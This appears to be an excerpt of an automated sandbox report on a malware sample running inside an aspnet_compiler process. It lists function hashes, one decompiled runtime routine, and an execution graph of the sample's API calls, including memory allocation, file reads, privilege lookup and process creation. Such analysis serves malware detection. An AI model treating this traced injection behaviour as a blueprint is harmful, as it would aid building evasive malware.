                                                  • Opcode ID: 1828abb7eb522d2de14b0b8a02807f0347c6694d891384046eaba987828d5493
                                                  • Instruction ID: 228dd8b08006ec1fccd6e69f2b022c0da4d607849231c1a9ef011cba5d46f64b
                                                  • Opcode Fuzzy Hash: 1828abb7eb522d2de14b0b8a02807f0347c6694d891384046eaba987828d5493
                                                  • Instruction Fuzzy Hash: 79900271A45100129140719948146464106B7E0781F55C111A1508668CC9948B5963E1
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 018C9950 Relevance: .0, Instructions: 4COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.342566567.0000000001860000.00000040.00000800.00020000.00000000.sdmp, Offset: 01860000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_1860000_aspnet_compiler.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 2527c53e42f68df6cf1727896c7dbd5c0fbdfcbdcec56966f71a0f552ba0d6b8
                                                  • Instruction ID: 8361804da21edbf7fbfc1f2b7cc9f02d305057c58493939d19b295e7a11832f9
                                                  • Opcode Fuzzy Hash: 2527c53e42f68df6cf1727896c7dbd5c0fbdfcbdcec56966f71a0f552ba0d6b8
                                                  • Instruction Fuzzy Hash: 8E9002A124150403D140659948046070105A7D0342F51C111A3058669ECA698D557175
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 018C98A0 Relevance: .0, Instructions: 4COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.342566567.0000000001860000.00000040.00000800.00020000.00000000.sdmp, Offset: 01860000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_1860000_aspnet_compiler.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 0ab9a3dd447e67818a55f0d51716f2781ee5941ecb45d5482dcda731ea092027
                                                  • Instruction ID: a51ee2a9ecd3898eecc2ac71019b42089e60ddaa4451929cd5783f0d67319aed
                                                  • Opcode Fuzzy Hash: 0ab9a3dd447e67818a55f0d51716f2781ee5941ecb45d5482dcda731ea092027
                                                  • Instruction Fuzzy Hash: B390026134110402D102619944146060109E7D1385F91C112E2418669DC6658A57B172
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 018C9820 Relevance: .0, Instructions: 4COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.342566567.0000000001860000.00000040.00000800.00020000.00000000.sdmp, Offset: 01860000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_1860000_aspnet_compiler.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 534f0a4725d8a5165dc823e90519ea49acd384acb11e3b0f0a66344e5bc29e7e
                                                  • Instruction ID: c70a03689bd9cccf2a5dc518ddc3d86fe3462ebc802c04be092c72a41faa9f9a
                                                  • Opcode Fuzzy Hash: 534f0a4725d8a5165dc823e90519ea49acd384acb11e3b0f0a66344e5bc29e7e
                                                  • Instruction Fuzzy Hash: 5290027128110402D141719944046060109B7D0381F91C112A1418668EC6958B5ABAA1
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 018CB040 Relevance: .0, Instructions: 4COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.342566567.0000000001860000.00000040.00000800.00020000.00000000.sdmp, Offset: 01860000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_1860000_aspnet_compiler.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: a27d99553b3cf5c5e31b1988f56fa52d6aca75c35af62b5813d834cac0e7894f
                                                  • Instruction ID: abba5421a68defc248f1850aa26c1b823df72647ce51a93326b676807627a040
                                                  • Opcode Fuzzy Hash: a27d99553b3cf5c5e31b1988f56fa52d6aca75c35af62b5813d834cac0e7894f
                                                  • Instruction Fuzzy Hash: 5B9002A1641240434540B19948044065115B7E1341791C221A1448674CC6A88959A2A5
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 018CA3B0 Relevance: .0, Instructions: 4COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.342566567.0000000001860000.00000040.00000800.00020000.00000000.sdmp, Offset: 01860000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_1860000_aspnet_compiler.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 7282cc1ea8d94f8b400cb12d8c60c081be471aa2b8577124ccc3138577b59275
                                                  • Instruction ID: cf638400ee71e3099409939587b6a1ff8da2c69bd818251ff6bdefa1a704ccbe
                                                  • Opcode Fuzzy Hash: 7282cc1ea8d94f8b400cb12d8c60c081be471aa2b8577124ccc3138577b59275
                                                  • Instruction Fuzzy Hash: 1B90027124154002D1407199844460B5105B7E0341F51C511E1419668CC655895AA261
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 018C9B00 Relevance: .0, Instructions: 4COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.342566567.0000000001860000.00000040.00000800.00020000.00000000.sdmp, Offset: 01860000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_1860000_aspnet_compiler.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 0d1858722a5163fb71af6e93dd22281223bfdf3161ac3c64b981d6b9045d5409
                                                  • Instruction ID: 8cc9cfa1e11a230cde0b230a5ca2c2a0ee8e82ba4973b2031b33045639352bf0
                                                  • Opcode Fuzzy Hash: 0d1858722a5163fb71af6e93dd22281223bfdf3161ac3c64b981d6b9045d5409
                                                  • Instruction Fuzzy Hash: B590026128110802D140719984147070106E7D0741F51C111A1018668DC6568A6976F1
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 018C9A80 Relevance: .0, Instructions: 4COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.342566567.0000000001860000.00000040.00000800.00020000.00000000.sdmp, Offset: 01860000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_1860000_aspnet_compiler.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 9e21456db35ab337aba01c62ee1a351f1d4b454a127fe3592fe52a15358d96ea
                                                  • Instruction ID: 7b5d04380485a2fd41cf7bdfea0d7e06371e5bcacf7345cc124518d32a2e0af8
                                                  • Opcode Fuzzy Hash: 9e21456db35ab337aba01c62ee1a351f1d4b454a127fe3592fe52a15358d96ea
                                                  • Instruction Fuzzy Hash: 6790026124154442D14062994804B0F4205A7E1342F91C119A514A668CC95589596761
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 018C9A10 Relevance: .0, Instructions: 4COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.342566567.0000000001860000.00000040.00000800.00020000.00000000.sdmp, Offset: 01860000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_1860000_aspnet_compiler.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: fcba0f9d389bfee2605d0852d91b8fa5016c7fe186a9c05955003f901eb2412c
                                                  • Instruction ID: 67edeb98a292cb0f2d8a9c323486aee0ea94584ec07bf463cf644e1a3aa3bb62
                                                  • Opcode Fuzzy Hash: fcba0f9d389bfee2605d0852d91b8fa5016c7fe186a9c05955003f901eb2412c
                                                  • Instruction Fuzzy Hash: E890027124150402D100619948087470105A7D0342F51C111A6158669EC6A5C9957571
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 0191FDDA Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 42COMMON
                                                  Download Yara Rule
                                                  C-Code - Quality: 53%
                                                  			E0191FDDA(intOrPtr* __edx, intOrPtr _a4) {
				void* _t7;
				intOrPtr _t9;
				intOrPtr _t10;
				intOrPtr* _t12;
				intOrPtr* _t13;
				intOrPtr _t14;
				intOrPtr* _t15;

				_t13 = __edx;
				_push(_a4);
				_t14 =  *[fs:0x18];
				_t15 = _t12;
				_t7 = L018CCE00( *__edx,  *((intOrPtr*)(__edx + 4)), 0xff676980, 0xffffffff);
				_push(_t13);
				L01915720(0x65, 1, "RTL: Enter CriticalSection Timeout (%I64u secs) %d\n", _t7);
				_t9 =  *_t15;
				if(_t9 == 0xffffffff) {
					_t10 = 0;
				} else {
					_t10 =  *((intOrPtr*)(_t9 + 0x14));
				}
				_push(_t10);
				_push(_t15);
				_push( *((intOrPtr*)(_t15 + 0xc)));
				_push( *((intOrPtr*)(_t14 + 0x24)));
				return L01915720(0x65, 0, "RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u\n",  *((intOrPtr*)(_t14 + 0x20)));
			}










                                                  0x0191fdda
                                                  0x0191fde2
                                                  0x0191fde5
                                                  0x0191fdec
                                                  0x0191fdfa
                                                  0x0191fdff
                                                  0x0191fe0a
                                                  0x0191fe0f
                                                  0x0191fe17
                                                  0x0191fe1e
                                                  0x0191fe19
                                                  0x0191fe19
                                                  0x0191fe19
                                                  0x0191fe20
                                                  0x0191fe21
                                                  0x0191fe22
                                                  0x0191fe25
                                                  0x0191fe40

                                                  APIs
                                                  • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0191FDFA
                                                  Strings
                                                  • RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u, xrefs: 0191FE2B
                                                  • RTL: Enter CriticalSection Timeout (%I64u secs) %d, xrefs: 0191FE01
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.342566567.0000000001860000.00000040.00000800.00020000.00000000.sdmp, Offset: 01860000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_1860000_aspnet_compiler.jbxd
                                                  Similarity
                                                  • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                                  • String ID: RTL: Enter CriticalSection Timeout (%I64u secs) %d$RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u
                                                  • API String ID: 885266447-3903918235
                                                  • Opcode ID: f03391d5c6835eb78ba1374d3644fb5b6d65b4455b2b158d813ae16746d0918e
                                                  • Instruction ID: 6263befc02eb8eb50056b74288cb1380eec452df60b650e32f79191d5b6f83d5
                                                  • Opcode Fuzzy Hash: f03391d5c6835eb78ba1374d3644fb5b6d65b4455b2b158d813ae16746d0918e
                                                  • Instruction Fuzzy Hash: A6F0F632200205BFEB211A45DC02F23BF5BEB85B30F150318F62C961D1DA62F9A0D6F0
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Execution Graph

                                                  Execution Coverage:5%
                                                  Dynamic/Decrypted Code Coverage:2%
                                                  Signature Coverage:0%
                                                  Total number of Nodes:701
                                                  Total number of Limit Nodes:79
                                                  execution_graph 31168 2947300 31179 294a020 31168->31179 31170 294741c 31171 294733b 31171->31170 31182 2939b40 31171->31182 31175 29473a0 Sleep 31176 294738d 31175->31176 31176->31170 31176->31175 31191 2946f30 LdrLoadDll 31176->31191 31192 2947130 LdrLoadDll 31176->31192 31180 294a04d 31179->31180 31193 29487c0 31179->31193 31180->31171 31183 2939b64 31182->31183 31184 2939ba0 LdrLoadDll 31183->31184 31185 2939b6b 31183->31185 31184->31185 31186 2943e50 31185->31186 31187 2943e6a 31186->31187 31188 2943e5e 31186->31188 31187->31176 31188->31187 31200 29442d0 LdrLoadDll 31188->31200 31190 2943fbc 31190->31176 31191->31176 31192->31176 31196 29491e0 31193->31196 31195 29487dc NtAllocateVirtualMemory 31195->31180 31197 29491f0 31196->31197 31199 2949212 31196->31199 31198 2943e50 LdrLoadDll 31197->31198 31198->31199 31199->31195 31200->31190 31203 3759540 LdrInitializeThunk 31205 294d4ad 31208 2949c80 31205->31208 31209 2949ca6 31208->31209 31216 2938b60 31209->31216 31211 2949cb2 31212 2949cd6 31211->31212 31224 2937e40 31211->31224 31256 2948930 31212->31256 31217 2938b6d 31216->31217 31259 2938ab0 31216->31259 31219 2938b74 31217->31219 31271 2938a50 31217->31271 31219->31211 31225 2937e67 31224->31225 31672 293a010 31225->31672 31227 2937e79 31676 2939d60 31227->31676 31229 2937e96 31231 2937e9d 31229->31231 31727 2939c90 LdrLoadDll 31229->31727 31253 2937fe4 31231->31253 31680 293d170 31231->31680 31233 2937f06 31234 294a270 2 API calls 31233->31234 31233->31253 31235 2937f1c 31234->31235 31236 294a270 2 API calls 31235->31236 31237 2937f2d 31236->31237 31238 294a270 2 API calls 31237->31238 31239 2937f3e 31238->31239 31692 293aed0 31239->31692 31241 2937f51 31242 2943a50 8 API calls 31241->31242 31243 2937f62 31242->31243 31244 2943a50 8 API calls 31243->31244 31245 2937f73 31244->31245 31246 2937f93 31245->31246 31704 293ba40 31245->31704 31247 2943a50 8 API calls 31246->31247 31251 2937fdb 31246->31251 31254 2937faa 31247->31254 31710 2937c70 31251->31710 31253->31212 31254->31251 31729 293bae0 LdrLoadDll NtClose LdrInitializeThunk LdrInitializeThunk 31254->31729 31257 29491e0 LdrLoadDll 31256->31257 31258 294894f 31257->31258 31290 2946e50 31259->31290 31263 2938ad6 31263->31217 31264 2938acc 31264->31263 31297 2949530 31264->31297 31266 2938b13 31266->31263 31308 29388d0 31266->31308 31268 2938b33 31314 2938320 LdrLoadDll 31268->31314 31270 2938b45 31270->31217 31650 2949820 31271->31650 31274 2949820 LdrLoadDll 31275 2938a7b 31274->31275 31276 2949820 LdrLoadDll 31275->31276 31277 2938a91 31276->31277 31278 293cf70 31277->31278 31279 293cf89 31278->31279 31654 2939e90 31279->31654 31281 293cf9c 31658 2948460 31281->31658 31285 293cfc2 31288 293cfed 31285->31288 31665 29484e0 31285->31665 31287 2948710 2 API calls 31289 2938b85 31287->31289 31288->31287 31289->31211 31291 2946e5f 31290->31291 31292 2943e50 LdrLoadDll 31291->31292 31293 2938ac3 31292->31293 31294 2946d00 31293->31294 31315 2948880 31294->31315 31298 2949549 31297->31298 31318 2943a50 31298->31318 31300 2949561 31301 294956a 31300->31301 31357 2949370 31300->31357 31301->31266 31303 294957e 31303->31301 31375 2948180 31303->31375 31628 2936e20 31308->31628 31310 29388f1 31310->31268 31311 29388ea 31311->31310 31641 29370e0 31311->31641 31314->31270 31316 29491e0 LdrLoadDll 31315->31316 31317 2946d15 31316->31317 31317->31264 31319 2943d85 31318->31319 31320 2943a64 31318->31320 31319->31300 31320->31319 31383 2947ed0 31320->31383 31323 2943b90 31386 29485e0 31323->31386 31324 2943b73 31443 29486e0 LdrLoadDll 31324->31443 31327 2943bb7 31329 294a0a0 2 API calls 31327->31329 31328 2943b7d 31328->31300 31332 2943bc3 31329->31332 31330 2943d49 31333 2948710 2 API calls 31330->31333 31331 2943d5f 31452 2943790 LdrLoadDll NtReadFile NtClose 31331->31452 31332->31328 31332->31330 31332->31331 31337 2943c52 31332->31337 31335 2943d50 31333->31335 31335->31300 31336 2943d72 31336->31300 31338 2943cb9 31337->31338 31340 2943c61 31337->31340 31338->31330 31339 2943ccc 31338->31339 31445 2948560 31339->31445 31342 2943c66 31340->31342 31343 2943c7a 31340->31343 31444 2943650 LdrLoadDll NtClose LdrInitializeThunk LdrInitializeThunk 31342->31444 31346 2943c97 31343->31346 31347 2943c7f 31343->31347 31346->31335 31401 2943410 31346->31401 31389 29436f0 31347->31389 31349 2943c70 31349->31300 31352 2943d2c 31449 2948710 31352->31449 31353 2943c8d 31353->31300 31354 2943caf 31354->31300 31356 2943d38 31356->31300 31358 294937a 31357->31358 31359 2949393 31358->31359 31360 294a020 2 API calls 31358->31360 31359->31303 31361 29493b4 31360->31361 31473 2943060 31361->31473 31363 2949400 31363->31303 31364 29493d7 31364->31363 31365 2943060 3 API calls 31364->31365 31368 29493f9 31365->31368 31367 294948a 31369 294949a 31367->31369 31599 2949180 LdrLoadDll 31367->31599 31368->31363 31505 2944390 31368->31505 31515 2948ff0 31369->31515 31372 29494c8 31594 2948140 31372->31594 31376 29491e0 LdrLoadDll 31375->31376 31377 294819c 31376->31377 31622 375967a 31377->31622 31378 29481b7 31380 294a0a0 31378->31380 31381 29495d9 31380->31381 31625 29488f0 31380->31625 31381->31266 31384 29491e0 LdrLoadDll 31383->31384 31385 2943b44 31384->31385 31385->31323 31385->31324 31385->31328 31387 29491e0 LdrLoadDll 31386->31387 31388 29485fc NtCreateFile 31387->31388 31388->31327 31390 294370c 31389->31390 31391 2948560 LdrLoadDll 31390->31391 31392 294372d 31391->31392 31393 2943734 31392->31393 31394 2943748 31392->31394 31395 2948710 2 API calls 31393->31395 31396 2948710 2 API calls 31394->31396 31397 294373d 31395->31397 31398 2943751 31396->31398 31397->31353 31453 294a2b0 31398->31453 31400 294375c 31400->31353 31402 294348e 31401->31402 31403 294345b 31401->31403 31404 29435d9 31402->31404 31408 29434aa 31402->31408 31405 2948560 LdrLoadDll 31403->31405 31406 2948560 LdrLoadDll 31404->31406 31407 2943476 31405->31407 31412 29435f4 31406->31412 31409 2948710 2 API calls 31407->31409 31410 2948560 LdrLoadDll 31408->31410 31411 294347f 31409->31411 31413 29434c5 31410->31413 31411->31354 31472 29485a0 LdrLoadDll 31412->31472 31415 29434e1 31413->31415 31416 29434cc 31413->31416 31419 29434e6 31415->31419 31420 29434fc 31415->31420 31418 2948710 2 API calls 31416->31418 31417 294362e 31421 2948710 2 API calls 31417->31421 31422 29434d5 31418->31422 31423 2948710 2 API calls 31419->31423 31428 2943501 31420->31428 31460 294a270 31420->31460 31424 2943639 31421->31424 31422->31354 31425 29434ef 31423->31425 31424->31354 31425->31354 31436 2943513 31428->31436 31463 2948690 31428->31463 31429 2943567 31430 294357e 31429->31430 31471 2948520 LdrLoadDll 31429->31471 31432 2943585 31430->31432 31433 294359a 31430->31433 31435 2948710 2 API calls 31432->31435 31434 2948710 2 API calls 31433->31434 31437 29435a3 31434->31437 31435->31436 31436->31354 31438 29435cf 31437->31438 31466 2949e70 31437->31466 31438->31354 31440 29435ba 31441 294a0a0 2 API calls 31440->31441 31442 29435c3 31441->31442 31442->31354 31443->31328 31444->31349 31446 2943d14 31445->31446 31447 29491e0 LdrLoadDll 31445->31447 31448 29485a0 LdrLoadDll 31446->31448 31447->31446 31448->31352 31450 29491e0 LdrLoadDll 31449->31450 31451 294872c NtClose 31450->31451 31451->31356 31452->31336 31456 29488b0 31453->31456 31455 294a2ca 31455->31400 31457 29491e0 LdrLoadDll 31456->31457 31458 29488cc RtlAllocateHeap 31457->31458 31459 29488df 31458->31459 31459->31455 31461 29488b0 2 API calls 31460->31461 31462 294a288 31461->31462 31462->31428 31464 29491e0 LdrLoadDll 31463->31464 31465 29486ac NtReadFile 31464->31465 31465->31429 31467 2949e94 31466->31467 31468 2949e7d 31466->31468 31467->31440 31468->31467 31469 294a270 2 API calls 31468->31469 31470 2949eab 31469->31470 31470->31440 31471->31430 31472->31417 31474 2943071 31473->31474 31475 2943079 31473->31475 31474->31364 31504 294334c 31475->31504 31600 294b250 31475->31600 31477 29430cd 31478 294b250 2 API calls 31477->31478 31481 29430d8 31478->31481 31479 2943126 31482 294b250 2 API calls 31479->31482 31481->31479 31483 294b380 3 API calls 31481->31483 31614 294b2f0 LdrLoadDll RtlAllocateHeap RtlFreeHeap 31481->31614 31485 294313a 31482->31485 31483->31481 31484 2943197 31486 294b250 2 API calls 31484->31486 31485->31484 31605 294b380 31485->31605 31488 29431ad 31486->31488 31489 29431ea 31488->31489 31492 294b380 3 API calls 31488->31492 31490 294b250 2 API calls 31489->31490 31491 29431f5 31490->31491 31493 294b380 3 API calls 31491->31493 31495 294322f 31491->31495 31492->31488 31493->31491 31611 294b2b0 31495->31611 31497 294b2b0 2 API calls 31498 294332e 31497->31498 31499 294b2b0 2 API calls 31498->31499 31500 2943338 31499->31500 31501 294b2b0 2 API calls 31500->31501 31502 2943342 31501->31502 31503 294b2b0 2 API calls 31502->31503 31503->31504 31504->31364 31506 29443a1 31505->31506 31507 2943a50 8 API calls 31506->31507 31508 29443b7 31507->31508 31509 2944405 31508->31509 31510 29443f2 31508->31510 31514 294440a 31508->31514 31512 294a0a0 2 API calls 31509->31512 31511 294a0a0 2 API calls 31510->31511 31513 29443f7 31511->31513 31512->31514 31513->31367 31514->31367 31615 2948eb0 31515->31615 31518 2948eb0 LdrLoadDll 31519 294900d 31518->31519 31520 2948eb0 LdrLoadDll 31519->31520 31521 2949016 31520->31521 31522 2948eb0 LdrLoadDll 31521->31522 31523 294901f 31522->31523 31524 2948eb0 LdrLoadDll 31523->31524 31525 2949028 31524->31525 31526 2948eb0 LdrLoadDll 31525->31526 31527 2949031 31526->31527 31528 2948eb0 LdrLoadDll 31527->31528 31529 294903d 31528->31529 31530 2948eb0 LdrLoadDll 31529->31530 31531 2949046 31530->31531 31532 2948eb0 LdrLoadDll 31531->31532 31533 294904f 31532->31533 31534 2948eb0 LdrLoadDll 31533->31534 31535 2949058 31534->31535 31536 2948eb0 LdrLoadDll 31535->31536 31537 2949061 31536->31537 31538 2948eb0 LdrLoadDll 31537->31538 31539 294906a 31538->31539 31540 2948eb0 LdrLoadDll 31539->31540 31541 2949076 31540->31541 31542 2948eb0 LdrLoadDll 31541->31542 31543 294907f 31542->31543 31544 2948eb0 LdrLoadDll 31543->31544 31545 2949088 31544->31545 31546 2948eb0 LdrLoadDll 31545->31546 31547 2949091 31546->31547 31548 2948eb0 LdrLoadDll 31547->31548 31549 294909a 31548->31549 31550 2948eb0 LdrLoadDll 31549->31550 31551 29490a3 31550->31551 31552 2948eb0 LdrLoadDll 31551->31552 31553 29490af 31552->31553 31554 2948eb0 LdrLoadDll 31553->31554 31555 29490b8 31554->31555 31556 2948eb0 LdrLoadDll 31555->31556 31557 29490c1 31556->31557 31558 2948eb0 LdrLoadDll 31557->31558 31559 29490ca 31558->31559 31560 2948eb0 LdrLoadDll 31559->31560 31561 29490d3 31560->31561 31562 2948eb0 LdrLoadDll 31561->31562 31563 29490dc 31562->31563 31564 2948eb0 LdrLoadDll 31563->31564 31565 29490e8 31564->31565 31566 2948eb0 LdrLoadDll 31565->31566 31567 29490f1 31566->31567 31568 2948eb0 LdrLoadDll 31567->31568 31569 29490fa 31568->31569 31570 2948eb0 LdrLoadDll 31569->31570 31571 2949103 31570->31571 31572 2948eb0 LdrLoadDll 31571->31572 31573 294910c 31572->31573 31574 2948eb0 LdrLoadDll 31573->31574 31575 2949115 31574->31575 31576 2948eb0 LdrLoadDll 31575->31576 31577 2949121 31576->31577 31578 2948eb0 LdrLoadDll 31577->31578 31579 294912a 31578->31579 31580 2948eb0 LdrLoadDll 31579->31580 31581 2949133 31580->31581 31582 2948eb0 LdrLoadDll 31581->31582 31583 294913c 31582->31583 31584 2948eb0 LdrLoadDll 31583->31584 31585 2949145 31584->31585 31586 2948eb0 LdrLoadDll 31585->31586 31587 294914e 31586->31587 31588 2948eb0 LdrLoadDll 31587->31588 31589 294915a 31588->31589 31590 2948eb0 LdrLoadDll 31589->31590 31591 2949163 31590->31591 31592 2948eb0 LdrLoadDll 31591->31592 31593 294916c 31592->31593 31593->31372 31595 29491e0 LdrLoadDll 31594->31595 31596 294815c 31595->31596 31621 3759860 LdrInitializeThunk 31596->31621 31597 2948173 31597->31303 31599->31369 31601 294b266 31600->31601 31602 294b260 31600->31602 31603 294a270 2 API calls 31601->31603 31602->31477 31604 294b28c 31603->31604 31604->31477 31606 294b2f0 31605->31606 31607 294a270 2 API calls 31606->31607 31608 294b34d 31606->31608 31609 294b32a 31607->31609 31608->31485 31610 294a0a0 2 API calls 31609->31610 31610->31608 31612 294a0a0 2 API calls 31611->31612 31613 2943324 31612->31613 31613->31497 31614->31481 31616 2948ecb 31615->31616 31617 2943e50 LdrLoadDll 31616->31617 31618 2948eeb 31617->31618 31619 2943e50 LdrLoadDll 31618->31619 31620 2948f97 31618->31620 31619->31620 31620->31518 31621->31597 31623 3759681 31622->31623 31624 375968f LdrInitializeThunk 31622->31624 31623->31378 31624->31378 31626 29491e0 LdrLoadDll 31625->31626 31627 294890c RtlFreeHeap 31626->31627 31627->31381 31629 2936e30 31628->31629 31630 2936e2b 31628->31630 31631 294a020 2 API calls 31629->31631 31630->31311 31637 2936e55 31631->31637 31632 2936eb8 31632->31311 31633 2948140 2 API calls 31633->31637 31634 2936ebe 31636 2936ee4 31634->31636 31638 2948840 2 API calls 31634->31638 31636->31311 31637->31632 31637->31633 31637->31634 31639 294a020 2 API calls 31637->31639 31644 2948840 31637->31644 31640 2936ed5 31638->31640 31639->31637 31640->31311 31642 2948840 2 API calls 31641->31642 31643 29370fe 31642->31643 31643->31268 31645 294885c 31644->31645 31646 29491e0 LdrLoadDll 31644->31646 31649 37596e0 LdrInitializeThunk 31645->31649 31646->31645 31647 2948873 31647->31637 31649->31647 31651 2949843 31650->31651 31652 2939b40 LdrLoadDll 31651->31652 31653 2938a6a 31652->31653 31653->31274 31656 2939eb3 31654->31656 31655 2939f30 31655->31281 31656->31655 31670 2947f10 LdrLoadDll 31656->31670 31659 29491e0 LdrLoadDll 31658->31659 31660 293cfab 31659->31660 31660->31289 31661 2948a50 31660->31661 31662 2948a56 31661->31662 31663 29491e0 LdrLoadDll 31662->31663 31664 2948a6f LookupPrivilegeValueW 31663->31664 31664->31285 31666 29491e0 LdrLoadDll 31665->31666 31667 29484fc 31666->31667 31671 3759910 LdrInitializeThunk 31667->31671 31668 294851b 31668->31288 31670->31655 31671->31668 31673 293a037 31672->31673 31674 2939e90 LdrLoadDll 31673->31674 31675 293a066 31674->31675 31675->31227 31677 2939d84 31676->31677 31730 2947f10 LdrLoadDll 31677->31730 31679 2939dbe 31679->31229 31681 293d19c 31680->31681 31682 293a010 LdrLoadDll 31681->31682 31683 293d1ae 31682->31683 31731 293d080 31683->31731 31686 293d1e1 31688 293d1f2 31686->31688 31691 2948710 2 API calls 31686->31691 31687 293d1c9 31689 293d1d4 31687->31689 31690 2948710 2 API calls 31687->31690 31688->31233 31689->31233 31690->31689 31691->31688 31693 293aee6 31692->31693 31694 293aef0 31692->31694 31693->31241 31695 2939e90 LdrLoadDll 31694->31695 31696 293af61 31695->31696 31697 2939d60 LdrLoadDll 31696->31697 31698 293af75 31697->31698 31699 293af98 31698->31699 31700 2939e90 LdrLoadDll 31698->31700 31699->31241 31701 293afb4 31700->31701 31702 2943a50 8 API calls 31701->31702 31703 293b009 31702->31703 31703->31241 31705 293ba66 31704->31705 31706 2939e90 LdrLoadDll 31705->31706 31707 293ba7a 31706->31707 31750 293b730 31707->31750 31709 2937f8c 31728 293b020 LdrLoadDll 31709->31728 31779 293d430 31710->31779 31712 2937e31 31712->31253 31713 2937c83 31713->31712 31784 29433a0 31713->31784 31715 2937ce2 31715->31712 31787 2937a20 31715->31787 31718 294b250 2 API calls 31719 2937d29 31718->31719 31720 294b380 3 API calls 31719->31720 31724 2937d3e 31720->31724 31721 2936e20 4 API calls 31721->31724 31724->31712 31724->31721 31726 29370e0 2 API calls 31724->31726 31792 293ac00 31724->31792 31842 293d3d0 31724->31842 31846 293ceb0 21 API calls 31724->31846 31726->31724 31727->31231 31728->31246 31729->31251 31730->31679 31732 293d09a 31731->31732 31740 293d150 31731->31740 31733 2939e90 LdrLoadDll 31732->31733 31734 293d0bc 31733->31734 31741 29481c0 31734->31741 31736 293d0fe 31744 2948200 31736->31744 31739 2948710 2 API calls 31739->31740 31740->31686 31740->31687 31742 29481dc 31741->31742 31743 29491e0 LdrLoadDll 31741->31743 31742->31736 31743->31742 31745 29491e0 LdrLoadDll 31744->31745 31746 294821c 31745->31746 31749 3759fe0 LdrInitializeThunk 31746->31749 31747 293d144 31747->31739 31749->31747 31751 293b747 31750->31751 31759 293d470 31751->31759 31755 293b7bb 31756 293b7c2 31755->31756 31770 2948520 LdrLoadDll 31755->31770 31756->31709 31758 293b7d5 31758->31709 31760 293d495 31759->31760 31771 2937120 31760->31771 31762 293b78f 31767 2948960 31762->31767 31763 2943a50 8 API calls 31765 293d4b9 31763->31765 31765->31762 31765->31763 31766 294a0a0 2 API calls 31765->31766 31778 293d2b0 LdrLoadDll CreateProcessInternalW LdrInitializeThunk 31765->31778 31766->31765 31768 294897f CreateProcessInternalW 31767->31768 31769 29491e0 LdrLoadDll 31767->31769 31768->31755 31769->31768 31770->31758 31772 293721f 31771->31772 31773 2937135 31771->31773 31772->31765 31773->31772 31774 2943a50 8 API calls 31773->31774 31775 29371a2 31774->31775 31776 294a0a0 2 API calls 31775->31776 31777 29371c9 31775->31777 31776->31777 31777->31765 31778->31765 31780 2943e50 LdrLoadDll 31779->31780 31781 293d44f 31780->31781 31782 293d456 SetErrorMode 31781->31782 31783 293d45d 31781->31783 31782->31783 31783->31713 31786 29433c6 31784->31786 31847 293d200 31784->31847 31786->31715 31788 294a020 2 API calls 31787->31788 31791 2937a45 31787->31791 31788->31791 31789 2937c5a 31789->31718 31791->31789 31866 2947b00 31791->31866 31793 293ac1f 31792->31793 31794 293ac19 31792->31794 31923 2938620 31793->31923 31914 293ccc0 31794->31914 31797 293ac2c 31798 294b380 3 API calls 31797->31798 31841 293aeb8 31797->31841 31799 293ac48 31798->31799 